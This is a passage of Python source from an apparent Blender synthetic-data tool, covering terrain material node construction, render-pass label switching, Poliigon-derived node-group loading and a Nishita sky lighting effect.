node_offset=[_node_offset[0]-500, _node_offset[1]-1700])
# set default value
_label_node.inputs[0].default_value=1
############################################################################## end of setup semantic nodes #
# setup instance nodes #####################################################################################
# define default label ID vector
# TODO: this parameter should be able to be overwritten
_label_ID_vec = [0]
# create switching nodes for semantics
_instance_switching_node = self.create_single_semantic_node(\
node_tree=_terrain_material,
label_ID=_label_ID_vec[0],
num_label_per_channel=15,
node_offset=[_node_offset[0], _node_offset[1]-2000])
# link switching nodes with tree
_terrain_material.node_tree.links.new(_instance_switching_node.inputs[1], _label_node.outputs[0])
# update _instance_switching_node_list list
_instance_switching_node_list.append(_instance_switching_node)
# update current last output
_label_node = _instance_switching_node
############################################################################## end of setup instance nodes #
# mix current with last texture ############################################################################
if _latest_col_output == None:
# if no last texture is set, set current to last texture
_latest_col_output = _current_col_output
_latest_rough_output = _current_rough_output
_latest_spec_output = _current_spec_output
_latest_nrm_output = _current_nrm_output
_latest_disp_output = _current_disp_output
_latest_label_output = _label_node
else:
# create noise shader to mix terrains ##################################################################
# add new noise shader
_noise_tex_coord_node = _terrain_material.node_tree.nodes.new("ShaderNodeTexCoord")
_noise_tex_coord_node.location = (_node_offset[0]+600,_node_offset[1]-100)
_noise_mapping_node = _terrain_material.node_tree.nodes.new("ShaderNodeMapping")
_noise_mapping_node.location = (_node_offset[0]+1400,_node_offset[1]-100)
_noise_tex_node = _terrain_material.node_tree.nodes.new("ShaderNodeTexNoise")
_noise_tex_node.location = (_node_offset[0]+1800,_node_offset[1]-100)
_noise_color_ramp_node = _terrain_material.node_tree.nodes.new("ShaderNodeValToRGB")
_noise_color_ramp_node.location = (_node_offset[0]+2200,_node_offset[1]-100)
if hard_label_borders:
_noise_color_label_ramp_node = _terrain_material.node_tree.nodes.new("ShaderNodeValToRGB")
_noise_color_label_ramp_node.location = (_node_offset[0]+2200,_node_offset[1]+200)
_noise_color_label_ramp_node.color_ramp.interpolation = 'CONSTANT'
# fill in noise values #################################################################################
_noise_tex_node.inputs[2].default_value = \
random.uniform(general_terrain_cfg['mergingNoise']['Scale'][0],\
general_terrain_cfg['mergingNoise']['Scale'][-1])
_noise_tex_node.inputs[3].default_value = \
random.uniform(general_terrain_cfg['mergingNoise']['Detail'][0],\
general_terrain_cfg['mergingNoise']['Detail'][-1])
_noise_tex_node.inputs[4].default_value = \
random.uniform(general_terrain_cfg['mergingNoise']['Roughness'][0],\
general_terrain_cfg['mergingNoise']['Roughness'][-1])
_noise_tex_node.inputs[5].default_value = \
random.uniform(general_terrain_cfg['mergingNoise']['Distortion'][0],\
general_terrain_cfg['mergingNoise']['Distortion'][-1])
########################################################################## end of fill in noise values #
# even split of rgb textures
_noise_color_ramp_node.color_ramp.elements[0].position = 0.48
_noise_color_ramp_node.color_ramp.elements[1].position = 0.52
# calculate split of label noise split
if hard_label_borders:
middleSlot = 0.5*(_noise_color_ramp_node.color_ramp.elements[1].position + \
_noise_color_ramp_node.color_ramp.elements[0].position)
_noise_color_label_ramp_node.color_ramp.elements[0].position = middleSlot
_noise_color_label_ramp_node.color_ramp.elements[1].position = middleSlot+0.00001
# TODO: improve random sampling
_noise_mapping_node.inputs[2].default_value[0] = random.random()
_noise_mapping_node.inputs[2].default_value[1] = random.random()
_noise_mapping_node.inputs[2].default_value[2] = random.random()
##################################################
__noise_mapping_node_ist.append(_noise_mapping_node)
# link noise nodes #####################################################################################
_terrain_material.node_tree.links.new(_noise_mapping_node.inputs[0], _noise_tex_coord_node.outputs[0])
#_terrain_material.node_tree.links.new(_noise_mapping_node.inputs[0], _noise_tex_coord_node.outputs[2])
_terrain_material.node_tree.links.new(_noise_tex_node.inputs[0], _noise_mapping_node.outputs[0])
_terrain_material.node_tree.links.new(_noise_color_ramp_node.inputs[0], _noise_tex_node.outputs[0])
if hard_label_borders:
_terrain_material.node_tree.links.new( _noise_color_label_ramp_node.inputs[0],\
_noise_tex_node.outputs[0])
############################################################################## end of link noise nodes #
########################################################### end of create noise shader to mix terrains #
## COLOR MIX ####################################################################################
# add new mix shaders
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+3500,_node_offset[1]+200)
# combine shaders
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_col_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _current_col_output.outputs[0])
# set new output
_latest_col_output = mixShaderNode
####################################################################################
## SPEC MIX ####################################################################################
# add new mix shaders
if _latest_spec_output is None:
_latest_spec_output = _current_spec_output
else:
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+3500,_node_offset[1]+500)
# combine shaders
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_spec_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _current_spec_output.outputs[0])
# set new output
_latest_spec_output = mixShaderNode
####################################################################################
## ROUGHNESS MIX ####################################################################################
# add new mix shaders
if _latest_rough_output is None:
_latest_rough_output = _current_rough_output
else:
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+3500,_node_offset[1]+800)
# combine shaders
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_rough_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _current_rough_output.outputs[0])
# set new output
_latest_rough_output = mixShaderNode
####################################################################################
## NRM MIX ####################################################################################
# add new mix shaders
if _latest_nrm_output is None:
_latest_nrm_output = _current_nrm_output
else:
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+3500,_node_offset[1]+1100)
# combine shaders
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_nrm_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _current_nrm_output.outputs[0])
# set new output
_latest_nrm_output = mixShaderNode
####################################################################################
## LABEL MIX ####################################################################################
# add new mix shaders
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+2500,_node_offset[1]+300)
# combine shaders
if hard_label_borders:
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_label_ramp_node.outputs[0])
else:
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_label_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _label_node.outputs[0])
# set new output
_latest_label_output = mixShaderNode
####################################################################################
# DISPLACEMENT MIX ####################################################################################
if _latest_disp_output is None:
_latest_disp_output = _current_disp_output
else:
mixDISPShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixDISPShaderNode.location = (_node_offset[0]+2800,_node_offset[1]+300)
# combine shaders
_terrain_material.node_tree.links.new(mixDISPShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixDISPShaderNode.inputs[1], _latest_disp_output.outputs[0])
_terrain_material.node_tree.links.new(mixDISPShaderNode.inputs[2], _current_disp_output.outputs[0])
# set new output
_latest_disp_output = mixDISPShaderNode
####################################################################################
# adapt base position
_node_offset[1] = _node_offset[1] - 3000
##################################################################### end of mix current with last texture #
######################################################################### end of create mixed terrain material #
# TODO: the z component of the mapping node does not allow values greater than 20000! Better change to 4D mapping!
if (noise_phase_shift_enabled):
# create phase shift driver nodes
noisePhaseShiftOffset = _terrain_material.node_tree.nodes.new("ShaderNodeValue")
noisePhaseShiftOffset.location = (_node_offset[0]+700,_node_offset[1]-300)
noisePhaseShiftOffset.outputs[0].default_value = random.random()
noisePhaseShiftRate = _terrain_material.node_tree.nodes.new("ShaderNodeValue")
noisePhaseShiftRate.location = (_node_offset[0]+700,_node_offset[1]-500)
noisePhaseShiftRate.outputs[0].default_value = noise_phase_rate
noisePhaseShiftFrame = _terrain_material.node_tree.nodes.new("ShaderNodeValue")
noisePhaseShiftFrame.name = "frameID"
noisePhaseShiftFrame.location = (_node_offset[0]+700,_node_offset[1]-700)
noisePhaseShiftFrame.outputs[0].default_value = 0
# add logic ##########################################
noisePhaseShiftMultipleNode = _terrain_material.node_tree.nodes.new("ShaderNodeMath")
noisePhaseShiftMultipleNode.operation = 'MULTIPLY'
noisePhaseShiftMultipleNode.location = (_node_offset[0]+900,_node_offset[1]-600)
_terrain_material.node_tree.links.new(noisePhaseShiftMultipleNode.inputs[0], noisePhaseShiftRate.outputs[0])
_terrain_material.node_tree.links.new(noisePhaseShiftMultipleNode.inputs[1], noisePhaseShiftFrame.outputs[0])
_noise_phase_shift_add_node = _terrain_material.node_tree.nodes.new("ShaderNodeMath")
_noise_phase_shift_add_node.operation = 'ADD'
_noise_phase_shift_add_node.location = (_node_offset[0]+1100,_node_offset[1]-400)
_terrain_material.node_tree.links.new(_noise_phase_shift_add_node.inputs[0], noisePhaseShiftOffset.outputs[0])
_terrain_material.node_tree.links.new(_noise_phase_shift_add_node.inputs[1], noisePhaseShiftMultipleNode.outputs[0])
##########################################
# convert to vector ##############################################
noisePhaseShiftVector = _terrain_material.node_tree.nodes.new("ShaderNodeCombineXYZ")
noisePhaseShiftVector.location = (_node_offset[0]+1200,_node_offset[1]-600)
noisePhaseShiftVector.inputs[0].default_value = 1
noisePhaseShiftVector.inputs[1].default_value = 1
_terrain_material.node_tree.links.new(noisePhaseShiftVector.inputs[2], _noise_phase_shift_add_node.outputs[0])
####################################
for _mapping_node in __noise_mapping_node_ist:
# connect to noise mapping node
_terrain_material.node_tree.links.new(_mapping_node.inputs[3], noisePhaseShiftVector.outputs[0])
# create diffuse shader for labels: IMPORTANT, it has to be piped through a shader, otherwise no information gets through the diffuse render channel!
labelDiffuseNode = _terrain_material.node_tree.nodes.new("ShaderNodeBsdfDiffuse")
#labelDiffuseNode = _terrain_material.node_tree.nodes.new("ShaderNodeBsdfDiffuse")
labelDiffuseNode.location = (_node_offset[0]+3700,0)
#labelDiffuseNode.inputs[1].default_value = 1.0 # set roughness to 1. no glossy!
_terrain_material.node_tree.links.new(labelDiffuseNode.inputs[0], _latest_label_output.outputs[0])
# create Principled BSDF node and link it #############################################
PBSDFNode = _terrain_material.node_tree.nodes.new('ShaderNodeBsdfPrincipled')
PBSDFNode.location = (_node_offset[0]+200,_node_offset[1])
_terrain_material.node_tree.links.new(PBSDFNode.inputs[0], _latest_col_output.outputs[0])
if _latest_spec_output is not None:
_terrain_material.node_tree.links.new(PBSDFNode.inputs[5], _latest_spec_output.outputs[0])
if _latest_rough_output is not None:
_terrain_material.node_tree.links.new(PBSDFNode.inputs[7], _latest_rough_output.outputs[0])
if _latest_nrm_output is not None:
# add normal map
normalMapNode = _terrain_material.node_tree.nodes.new('ShaderNodeNormalMap')
normalMapNode.inputs[0].default_value = general_terrain_cfg['normalStrength']
normalMapNode.location = (_node_offset[0],_node_offset[1])
# link nodes
_terrain_material.node_tree.links.new(normalMapNode.inputs[1], _latest_nrm_output.outputs[0])
#_terrain_material.node_tree.links.new(PBSDFNode.inputs[19], normalMapNode.outputs[0])
_terrain_material.node_tree.links.new(PBSDFNode.inputs[20], normalMapNode.outputs[0])
######################################################################################
# link material output to last node ##################
# add new mix shaders
masterMixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixShader")
masterMixShaderNode.name = "rgb-label-mix"
masterMixShaderNode.label = "rgb-label-mix"
masterMixShaderNode.location = (_node_offset[0]+4000,0)
masterMixShaderNode.inputs[0].default_value = 0 # set actual terrain material as default; 1 for getting its label
##################
_terrain_material.node_tree.links.new(masterMixShaderNode.inputs[1], PBSDFNode.outputs[0])
_terrain_material.node_tree.links.new(masterMixShaderNode.inputs[2], labelDiffuseNode.outputs[0])
_terrain_material.node_tree.links.new(_material_output.inputs[0], masterMixShaderNode.outputs[0])
############################################################
# add disp mapping node
if _latest_disp_output is not None:
disp_mapping_node = _terrain_material.node_tree.nodes.new("ShaderNodeDisplacement")
disp_mapping_node.inputs[1].default_value = general_terrain_cfg['dispMidLevel']
disp_mapping_node.inputs[2].default_value = general_terrain_cfg['dispScale']
disp_mapping_node.location = (_node_offset[0]+4000,-150)
# link nodes
_terrain_material.node_tree.links.new(disp_mapping_node.inputs[0], _latest_disp_output.outputs[0])
_terrain_material.node_tree.links.new(_material_output.inputs[2], disp_mapping_node.outputs[0])
self._node_tree = _terrain_material
# Pass entries #################################################################################################
# RGBDPass entries #############################################################################################
self.add_pass_entry(pass_name="RGBDPass",
node_handle=masterMixShaderNode,
value_type="inputs",
value=[0,0])
for instance_node in _instance_switching_node_list:
self.add_pass_entry(pass_name="RGBDPass",
node_handle=instance_node,
value_type="inputs",
value=[0,0])
###################################################################################### end of RGBDPass entries #
# SemanticPass entries #########################################################################################
self.add_pass_entry(pass_name="SemanticPass",
node_handle=masterMixShaderNode,
value_type="inputs",
value=[0,1])
for instance_node in _instance_switching_node_list:
self.add_pass_entry(pass_name="SemanticPass",
node_handle=instance_node,
value_type="inputs",
value=[0,0])
################################################################################## end of SemanticPass entries #
# InstancePass entries #########################################################################################
for instance_node in _instance_switching_node_list:
self.add_pass_entry(pass_name="InstancePass",
node_handle=instance_node,
value_type="inputs",
value=[0,1])
################################################################################## end of InstancePass entries #
########################################################################################## end of Pass entries #
return _terrain_material
def additional_pass_action(self,pass_name, pass_cfg, keyframe):
""" overwrite base function
Args:
pass_name: name of pass to activate [string]
pass_cfg: specific parameters for the pass [dict]
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
None
"""
# set semantic ID ##############################################################################################
if "SemanticPass" == pass_name:
self._label_ID_node.outputs[0].default_value = pass_cfg["activationID"]+1
if keyframe > -1:
self._label_ID_node.outputs[0].keyframe_insert('default_value', frame=keyframe)
##################################################################### end of set interpolation to constant #
####################################################################################### end of set semantic ID #
if keyframe > -1:
# set interpolation to constant ############################################################################
_fcurves = self._node_tree.node_tree.animation_data.action.fcurves
for fcurve in _fcurves:
for kf in fcurve.keyframe_points:
kf.interpolation = 'CONSTANT'
def getMaterials(self):
return self._material_list
### The following lines are from https://www.poliigon.com/
"""
taken from Poliigon shader! >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
"""
@staticmethod
def load_nodegroup_config(engine_template):
"""Load in json node config for material based on set engine"""
jsonfile = os.path.join(
os.path.dirname(__file__), "engines", engine_template + ".json")
if not os.path.isfile(jsonfile):
print("Missing json file for workflow "+engine_template)
raise Exception("Missing json file for workflow")
with open(jsonfile) as jsonread:
mat_config = json.load(jsonread)
# mat_config = {}
# convert certain things,
# e.g., convert all locations to mathutils.vector(value)
# and turn the lists in the default values into sets/tuples
return mat_config
"""
taken from Poliigon shader! <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
"""
@staticmethod
def socket_type_to_class(type_id):
"""Mapping of input types to class strings"""
if type_id == 'RGBA': #??
return 'NodeSocketColor'
elif type_id == 'VALUE':
return 'NodeSocketFloat'
elif type_id == 'VECTOR':
return 'NodeSocketVector'
elif type_id == 'CUSTOM':
print("WARNING! Mapping custom socket tupe to float")
return 'NodeSocketFloat'
else:
raise Exception('Unknown node socket type: '+type_id)
@staticmethod
def socket_index_from_identifier(node, name, identifier, mode):
"""Get the input or output socket index based on identifier name"""
res = None
# short circuit return for routes, as the identifier doesn't match well
# (ie, identifier="output", but actual index available is "Output")
if node.type == "REROUTE":
return 0 # in either case, to or from
if mode == 'from':
iterset = node.outputs
elif mode == 'to':
iterset = node.inputs
else:
raise Exception('Invalid mode for socket identifier')
sockets = [sock.name for sock in iterset
if sock.name] # ignore empty string names... e.g. in principled shader
if len(sockets) == len(set(sockets)):
# all values are unique, we can use the Socket name directly
res = name
else:
# print("Names not unique in: ", sockets)
# Names not unique, fallback to using the identifier
for i, socket in enumerate(iterset):
# print(i, socket, socket.identifier, identifier)
if socket.identifier == identifier:
res = i
break
if res is None:
print('Could not determine node socket from input:')
print(node, identifier, mode)
raise Exception('Could not determine node socket from input')
return res
"""
taken from Poliigon shader! >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
"""
def create_nodegroup_from_config(self, mat_config):
"""Given a dictionary json object, create a node group"""
#self.material.name = 'blub'
self.verbose = True
nodegroup = bpy.data.node_groups.new(
'_mapping_node', type='ShaderNodeTree')
m_nodes = nodegroup.nodes
m_links = nodegroup.links
# cache nodes for applying color space, as with later 2.8 builds we
# can only do this after the image has been assigned to the node
apply_colorspaces = []
frames_with_children = []
for node_name, node_data in mat_config["nodes"].items():
if not hasattr(bpy.types, node_data["type_id"]):
if self.verbose:
print("Node not available here")
mat_config["nodes"][node_name]["datablock"] = None
continue
node = m_nodes.new(node_data["type_id"])
node.select = False
mat_config["nodes"][node_name]["datablock"] = node
node.name = node_name
if 'reroute' not in node_name.lower():
node.label = mat_config["nodes"][node_name]['label']
for key, value in node_data.items():
if key in {"type", "type_id", "datablock", "COMMENT_ONLY"}:
continue
if hasattr(value, '__call__'):
value = value()
if key=='color_space':
# special apply cases, to support newer 2.8 builds
apply_colorspaces.append([node, value])
elif key=='parent':
frames_with_children.append(value)
# apply parent (frame) to node if any
# setattr(node, key, mat_config["nodes"][value]["datablock"])
pass # TODO, get this working in 2.7
elif key=='text':
if node.name not in bpy.data.texts:
txtblock = bpy.data.texts.new(node.name)
txtblock.write(value)
else:
txtblock = bpy.data.texts[node.name]
node.text = txtblock
else: # general case
setattr(node, key, value)
# TODO: remove if 2.8 special spacing no longer needed
# # fix 2.8 node spacing
# if bpy.app.version >= (2, 80):
# # image nodes are wider now, move farther left
# if node.location[0] <= -430:
# node.location[0] -= 200
# if node_name == "Principled BSDF":
# node.location[1] += 50
# #node.location[0] *= 1.2 # space out nodes some more
# Apply the parents for nodes, now that all nodes exist
for node_name, node_data in mat_config["nodes"].items():
for key, value in node_data.items():
node = mat_config["nodes"][node_name]["datablock"]
if key!='parent':
continue
# apply parent (frame) to node if any
setattr(node, key, mat_config["nodes"][value]["datablock"])
# Repeat-apply location for frames
for node_name, node_data in mat_config["nodes"].items():
node = mat_config["nodes"][node_name]["datablock"]
if node.type != 'FRAME':
continue
elif node_name in frames_with_children:
# double coordinates for frames with children to show up right
node.location = [node_data['location'][0]*2, node_data['location'][1]*2]
else:
node.location = [node_data['location'][0], node_data['location'][1]]
# Create the group input and output sockets
for i, socket in enumerate(mat_config["inputs"]):
nodegroup.inputs.new(
self.socket_type_to_class(socket['type']), socket['name'])
if 'min' in socket:
nodegroup.inputs[i].min_value = socket['min']
if 'max' in socket:
nodegroup.inputs[i].max_value = socket['max']
nodegroup.inputs[i].default_value = socket['default']
for i, socket in enumerate(mat_config["outputs"]):
nodegroup.outputs.new(
self.socket_type_to_class(socket['type']), socket['name'])
if 'min' in socket:
nodegroup.outputs[i].min_value = socket['min']
if 'max' in socket:
nodegroup.outputs[i].max_value = socket['max']
nodegroup.outputs[i].default_value = socket['default']
if "COLOR" in mat_config and mat_config["nodes"]["COLOR"]["datablock"]:
# To set the diffuse color texture preview in cycles texture mode
mat_config["nodes"]["COLOR"]["datablock"].select = True
m_nodes.active = mat_config["nodes"]["COLOR"]["datablock"]
# Linking
for lnk in mat_config["links"]:
from_node = lnk['from']
from_socket = lnk['from_socket']
to_node = lnk['to']
to_socket = lnk['to_socket']
if not mat_config["nodes"][from_node] or not mat_config["nodes"][to_node]:
continue
# resolve the to_socket and from_socket to *index* (not name) input
# based on original key of '_socket.identifier' (uniquely named)
from_index = self.socket_index_from_identifier(
mat_config["nodes"][from_node]["datablock"],
from_socket, lnk['from_id'], 'from')
to_index = self.socket_index_from_identifier(
mat_config["nodes"][to_node]["datablock"],
to_socket, lnk['to_id'], 'to')
if from_index is None or to_index is None:
if self.verbose:
print("Skipping link, could not fetch index")
continue
m_links.new(
# mat_config["nodes"][from_node]["datablock"].outputs[from_socket],
# mat_config["nodes"][to_node]["datablock"].inputs[to_socket])
mat_config["nodes"][from_node]["datablock"].outputs[from_index],
mat_config["nodes"][to_node]["datablock"].inputs[to_index])
# updating defaults
for d_set in mat_config["defaults"]:
node = d_set['node']
socket = d_set['socket']
value = d_set['value']
socket_id = self.socket_index_from_identifier(
mat_config["nodes"][node]["datablock"],
d_set['socket'], d_set['socket_id'], 'to')
try:
mat_config["nodes"][node]["datablock"].inputs[socket_id].default_value = value
except Exception as err:
print("Poliigon: Error setting default node value: ", node, socket, socket_id, value, str(err))
return nodegroup
"""
taken from Poliigon shader! <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
"""
```
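The terrain material built above routes either the PBR shading or the label shading to the material output through the mix shader named `rgb-label-mix` (input 0: 0 selects the terrain shading, 1 selects the label output). Below is a minimal sketch of driving that switch directly on a material created by this class; the function name is illustrative and not part of the repo.

```python
# Minimal sketch: flip a terrain material between RGB and label output.
# Assumes the material was built by the class above, so a mix shader named
# "rgb-label-mix" exists in its node tree. The function name is illustrative.
import bpy

def set_label_mode(material, enable_label, keyframe=-1):
    mix_node = material.node_tree.nodes["rgb-label-mix"]
    mix_node.inputs[0].default_value = 1.0 if enable_label else 0.0
    if keyframe > -1:
        mix_node.inputs[0].keyframe_insert('default_value', frame=keyframe)
```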
#### File: src/assets/TSSAsset.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
from src.TSSBase import TSSBase
from src.tools.NodeTools import NodeTools
class TSSAsset(TSSBase,NodeTools):
"""docstring for TSSAsset"""
def __init__(self):
super(TSSAsset, self).__init__()
# class vars ###################################################################################################
############################################################################################ end of class vars #
def _reset(self):
""" reset all local vars
Args:
None
Returns:
None
"""
pass
def _print_msg(self,skk): print("\033[94m {}\033[00m" .format(skk))
def create(self):
pass
def step(self):
pass
```
#### File: src/assets/TSSMaterial.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
from src.assets.TSSAsset import TSSAsset
from src.assets.TSSModifieres import TSSModifieres
class TSSMaterial(TSSAsset,TSSModifieres):
"""docstring for TSSMaterial"""
def __init__(self):
super(TSSMaterial, self).__init__()
# class vars ###################################################################################################
self._material = None
self._node_tree = None
############################################################################################ end of class vars #
def reset_module(self):
""" reset all local vars
Args:
None
Returns:
None
"""
self._material = None
self._node_tree = None
self.reset()
def set_material(self,material):
self._material = material
def get_material(self):
return self._material
def create(self):
pass
def step(self):
pass
def additional_pass_action(self,pass_name, pass_cfg, keyframe):
""" overwrite base function
Args:
pass_name: name of pass to activate [string]
pass_cfg: specific parameters for the pass [dict]
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
None
"""
if keyframe > -1:
# set interpolation to constant ############################################################################
self._set_keyframe_interpolation(node_tree=self._node_tree,interpolation='CONSTANT')
```
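TSSMaterial only defines the hooks; concrete materials are expected to fill in create() and step(). A minimal, hypothetical subclass sketch follows (class and material names are illustrative, not taken from the repo); it mirrors how TerrainMaterial stores its material handle and node tree.

```python
# Hypothetical minimal subclass; names are illustrative only.
import bpy
from src.assets.TSSMaterial import TSSMaterial

class TSSUniformColorMaterial(TSSMaterial):
    """docstring for TSSUniformColorMaterial"""
    def create(self):
        _mat = bpy.data.materials.new(name="uniform_color_material")
        _mat.use_nodes = True
        self.set_material(_mat)
        self._node_tree = _mat

    def step(self):
        pass
```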
#### File: environment_effects/effects/EnvLightBlenderSky.py
```python
import bpy
# utility imports
import random
import math
from src.TSSBase import TSSBase
from src.environment_effects.TSSEnvironmentEffects import TSSEnvironmentEffects
class EnvLightBlenderSky(TSSEnvironmentEffects):
"""docstring for EnvLightBlenderSky"""
def __init__(self):
super(EnvLightBlenderSky, self).__init__()
# class vars ###################################################################################################
self._sky_node = None
self._label_ID_Node = None
self._last_keyframe = -1
############################################################################################ end of class vars #
def reset(self):
""" reset function
Args:
None
Returns:
None
"""
# class vars ###################################################################################################
self._sky_node = None
self._label_ID_Node = None
self._last_keyframe = -1
############################################################################################ end of class vars #
def _add_sky(self, last_element, node_offset=[0,0]):
""" function to create sky
Args:
last_element: last element of node tree [blObject]
node_offset: offset position for nodes [x,y] [list]
Returns:
None
"""
# create sky shader ############################################################################################
self._sky_node = self._world_node_tree.node_tree.nodes.new('ShaderNodeTexSky')
self._sky_node.location = (node_offset[0]-2000,node_offset[1]+300)
##################################################################################### end of create sky shader #
# attach last output to Background Shader node #################################################################
_str = self._world_node_tree.node_tree.nodes["World Output"].inputs[0]
_current_last_output = self._sky_node.outputs[0]
########################################################## end of attach last output to Background Shader node #
# mix rgb to mix last_element with sky #########################################################################
if last_element is not None:
_mix_node = self._world_node_tree.node_tree.nodes.new('ShaderNodeMixRGB')
_mix_node.location = (node_offset[0]-1500,node_offset[1]+300)
_mix_node.inputs[0].default_value = 1.0
_mix_node.blend_type = 'OVERLAY'
self._world_node_tree.node_tree.links.new(_mix_node.inputs[1],last_element)
self._world_node_tree.node_tree.links.new(_mix_node.inputs[2],self._sky_node.outputs[0])
_current_last_output = _mix_node.outputs[0]
################################################################## end of mix rgb to mix last_element with sky #
# set semantic nodes ###########################################################################################
# get label vector from cfg
_label_ID_vec = self._cfg["passParams"]["SemanticPass"]["semanticIDVec"]
# create switching nodes for semantics
_semantic_switching_node,self._label_ID_Node = self.create_semantic_nodes( node_tree=self._world_node_tree,
label_ID_vec=_label_ID_vec,
num_label_per_channel=15)
# link switching nodes with tree
self._world_node_tree.node_tree.links.new(_semantic_switching_node.inputs[1], _current_last_output)
# update current last output
_current_last_output = _semantic_switching_node.outputs[0]
#################################################################################### end of set semantic nodes #
# set instance nodes ###########################################################################################
_label_ID_vec = [0]
# create switching nodes for semantics
_instance_switching_node = self.create_single_semantic_node(node_tree=self._world_node_tree,
label_ID=_label_ID_vec[0],
num_label_per_channel=15,
node_offset=[-2000,-2000])
# link switching nodes with tree
self._world_node_tree.node_tree.links.new(_instance_switching_node.inputs[1], _current_last_output)
# update current last output
_current_last_output = _instance_switching_node.outputs[0]
#################################################################################### end of set instance nodes #
# Pass entries #################################################################################################
# RGBDPass entries #############################################################################################
self.add_pass_entry(pass_name="RGBDPass",
node_handle=_semantic_switching_node,
value_type="inputs",
value=[0,0])
self.add_pass_entry(pass_name="RGBDPass",
node_handle=_instance_switching_node,
value_type="inputs",
value=[0,0])
###################################################################################### end of RGBDPass entries #
# SemanticPass entries #########################################################################################
self.add_pass_entry(pass_name="SemanticPass",
node_handle=_semantic_switching_node,
value_type="inputs",
value=[0,1])
self.add_pass_entry(pass_name="SemanticPass",
node_handle=_instance_switching_node,
value_type="inputs",
value=[0,0])
################################################################################## end of SemanticPass entries #
# InstancePass entries #########################################################################################
self.add_pass_entry(pass_name="InstancePass",
node_handle=_instance_switching_node,
value_type="inputs",
value=[0,1])
################################################################################## end of InstancePass entries #
########################################################################################## end of Pass entries #
# return handle to last output node
return _current_last_output
def additional_pass_action(self,pass_name, pass_cfg, keyframe):
""" overwrite base function
Args:
pass_name: name of pass to activate [string]
pass_cfg: specific parameters for the pass [dict]
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
None
"""
# set semantic ID ##############################################################################################
if "SemanticPass" == pass_name:
self._label_ID_Node.outputs[0].default_value = pass_cfg["activationID"]+1
if keyframe > -1:
self._label_ID_Node.outputs[0].keyframe_insert('default_value', frame=keyframe)
####################################################################################### end of set semantic ID #
def _get_random_number(self,min_max_array):
""" get random number from array; use uniformal distribution
Args:
min_max_array: define min and max value [min_value, max_value] [float,float]; if just one value is
added to list, the same value is returned
Returns:
return random value [float]
"""
# check length of array and calculate random number ############################################################
if len(min_max_array) > 1:
return random.uniform(min_max_array[0],min_max_array[1])
else:
return min_max_array[0]
##################################################### end of check length of array and calculate random number #
def _set_sky_parameters_NISHITA(self,params,keyframe=-1):
""" set sky NISHITA parameter for current frame
Args:
params: params which are to be set for the sky node [dict]
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
settings that were chosen for the sky node [dict]
"""
# local vars ###################################################################################################
_current_settings = {}
############################################################################################ end of local vars #
# set sky type to NISHITA
self._sky_node.sky_type = 'NISHITA'
_current_settings['SkyType'] = 'NISHITA'
# generate values for sky node and apply to node ###############################################################
# set size of sun ##############################################################################################
_current_settings['SunSize'] = self._get_random_number(params['SunSize'])
self._sky_node.sun_size = math.radians(_current_settings['SunSize'])
####################################################################################### end of set size of sun #
# set sun intensity ############################################################################################
_current_settings['SunIntensity'] = self._get_random_number(params['SunIntensity'])
self._sky_node.sun_intensity = _current_settings['SunIntensity']
##################################################################################### end of set sun intensity #
# set elevation of sun ########################################################################################
_current_settings['SunElevation'] = self._get_random_number(params['SunElevation'])
self._sky_node.sun_elevation = math.radians(_current_settings['SunElevation'])
################################################################################# end of set elevation of sun #
# set rotation of sun ##########################################################################################
_current_settings['SunRotation'] = self._get_random_number(params['SunRotation'])
self._sky_node.sun_rotation = math.radians(_current_settings['SunRotation'])
################################################################################## end of set rotation of sun #
# set altitude of sun ##########################################################################################
_current_settings['SunAltitude'] = self._get_random_number(params['SunAltitude'])
self._sky_node.altitude = _current_settings['SunAltitude']
################################################################################### end of set altitude of sun #
# set air density value ########################################################################################
